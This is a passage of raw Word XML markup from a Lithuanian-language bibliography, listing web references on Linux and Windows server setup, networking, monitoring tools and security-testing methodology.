          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">LinuxBabe. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId320" w:history="1">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://www.linuxbabe.com/redhat/install-nextcloud-rhel-8-centos-8-nginx-lemp</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="514FD757"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Harris, J. (2020, gruodžio 24). How to Use Rsync to Create a Backup on CentOS 8. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">ServerSpace. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Prieiga per internetą: https://serverspace.us/support/help/use-rsync-to-create-a-backup-on-centos-8/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F050EDA"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Herzog, P. (2010). The Open Source Security Testing Methodology Manual. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">ISECOM. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId321">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t>https://www.isecom.org/OSSTMM.3.pdf</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0017B0C5"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Hoffman, C. (2017, birželio 14). How to Use Wireshark to Capture, Filter and Inspect Packets. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">How-To Geek. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId322">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t>https://www.howtogeek.com/104278/how-to-use-wireshark-to-capture-filter-and-inspect-packets/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="27E51483"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How to Build the Best PC for 3D Rendering and Animation (2020, spalio 2). </w:t>
      </w:r>
      <w:hyperlink r:id="rId323">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rFonts w:eastAsia="Times New Roman"/>
            <w:i/>
            <w:iCs/>
          </w:rPr>
          <w:t>Logical Increments</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">. Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId324">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t>https://www.logicalincrements.com/articles/building-pc-3d-rendering-animation</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1A50C01B"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How to install and configure Zabbix on CentOS 7. (2019, gruodžio 22). </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">FOSSLinux. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId325">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t>https://www.fosslinux.com/7705/how-to-install-and-configure-zabbix-on-centos-7.htm</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="26E69D1C"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How to install CentOS 8 with VirtualBox 6.1 on Windows 10. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Vitux. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId326">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://vitux.com/install-centos-with-virtualbox-on-windows/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7825F1B7" w14:textId="77777777" w:rsidR="000406E9" w:rsidRPr="005A5C28" w:rsidRDefault="000406E9" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">How to Install System Center Service Manager 2019 Step by Step Full. (2020, rugsėjo 21). </w:t>
      </w:r>
      <w:hyperlink r:id="rId327">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
            <w:i/>
            <w:iCs/>
            <w:u w:val="none"/>
          </w:rPr>
          <w:t>Labs Hands On</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId328">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t>https://www.youtube.com/watch?v=3TPsuio8PP8</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="62B702AC"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How to Install Zabbix 5.0 or 5.2 on CentOS 8 [Step-by-Step]. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Best monitoring tools. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId329">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t>https://bestmonitoringtools.com/how-to-install-zabbix-server-on-centos-or-rhel/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="21EE70CE"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iCloud.</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId330">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://www.apple.com/legal/internet-services/icloud/en/terms.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="536A4D07"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Impact of frequent power outtage to Catalyst switches.</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">(2004, spalio 14). </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Cisco Community.</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId331">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t>https://community.cisco.com/t5/other-network-architecture/impact-of-frequent-power-outtage-to-catalyst-switches/td-p/360510</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3019D63E"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Instagram.</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId332">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>http://instagram.com/legal/terms/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6A3CD40D"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Install Hyper-V on Windows 10. (2019, vasario 15). </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Microsoft. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId333">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://docs.microsoft.com/en-us/virtualization/hyper-v-on-windows/quick-start/enable-hyper-v</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3A9FD429"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Install Service Manager on a single computer (minimum configuration). (2018, sausio 23). </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Microsoft. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId334">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t>https://docs.microsoft.com/en-us/system-center/scsm/install-one-computer?view=sc-sm-2019</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="209AEFC7" w14:textId="77777777" w:rsidR="000406E9" w:rsidRPr="005A5C28" w:rsidRDefault="008F04A2"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hyperlink r:id="rId335">
        <w:r w:rsidR="000406E9" w:rsidRPr="005A5C28">
          <w:rPr>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:kern w:val="0"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="lt-LT" w:eastAsia="en-US"/>
          </w:rPr>
          <w:t>Install System Center Configuration Manager 2019 (SCCM 2019)</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="000406E9" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. (2019, balandžio 20). </w:t>
      </w:r>
      <w:r w:rsidR="000406E9" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Microsoft Lab. </w:t>
      </w:r>
      <w:r w:rsidR="000406E9" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId336" w:history="1">
        <w:r w:rsidR="000406E9" w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://www.youtube.com/watch?v=mN12es1rbJ8</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="72ED78AF"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Install, upgrade, or migrate to Windows Server (2020, rugsėjo 17). </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Microsoft.</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Prieiga per internetą:</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId337">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t>https://docs.microsoft.com/en-us/windows-server/get-started-19/install-upgrade-migrate-19</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1B3BD826"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Installing and using VirtualBox on CentOS. (2020, lapkričio 20). Prieiga per internetą: </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">CentOS. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>https://wiki.centos.org/HowTos/Virtualization/VirtualBox</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61DFE5F8"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Intel® Core™ Processor Family. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Intel. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId338">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t>https://www.intel.com/content/www/us/en/products/processors/core.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="658655D3"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i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Internet Archive.</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Non-profit library of millions of free books, movies, software, music, websites, and more.</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId339">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t>http://www.archive.org</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6D976DB8"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InterVLAN Routing. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Networklessons.com</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId340">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t>https://networklessons.com/switching/intervlan-routing</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="65592586" w14:textId="77777777" w:rsidR="000406E9" w:rsidRPr="005A5C28" w:rsidRDefault="000406E9" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Introduction to Packet Tracer. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Cisco Networking Academy. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId341">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t>https://www.netacad.com/courses/packet-tracer/introduction-packet-tracer</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="28018549" w14:textId="77777777" w:rsidR="000406E9" w:rsidRPr="005A5C28" w:rsidRDefault="000406E9" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Kaip veikia IP adresai? </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Lt.phhsnews.com</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">. Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId342" w:history="1">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
            <w:kern w:val="36"/>
            <w:lang w:eastAsia="x-none"/>
          </w:rPr>
          <w:t>https://lt.phhsnews.com/how-do-ip-addresses-work5759</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5D6301CE"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Kapiswe, S. (2021, sausio 1). 7 Best WiFi Analyzer For Windows 10, 8 and 7. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Tech4fresher. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId343">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t>https://tech4fresher.com/best-wifi-analyzer-for-windows/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3A493632"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Kibet. J. (2019, spalio 19). Install and Configure IIS Web Server on Windows Server 2019. Computingforgeeks. Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId344" w:history="1">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t>https://computingforgeeks.com/install-and-configure-iis-web-server-on-windows-server/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="25B0E765" w14:textId="77777777" w:rsidR="000406E9" w:rsidRPr="005A5C28" w:rsidRDefault="000406E9" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Koli, D. (2019, sausio 19). Windows Server 2019 with Desktop Experience (Full Interface) - Clean Installation. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">DSKOLI. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId345">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t>https://www.dskoli.in/blog/windows-server-2019-with-desktop-experience-full-interface-clean-installation</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0EA9CF42"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Kumar, A. Top 5 Operating System For Ethical Hacking and Penetration Testing – Download Free. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Darkwiki.in.</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId346">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://www.darkwiki.in/top-5-operating-system-for-ethical-hacking-and-penetration-testing/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2380C7FB"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Lai, L. (2020). BIOS Not Detecting SSD in Computer. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Driver easy. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Prieiga per internetą: </w:t>
      </w:r>
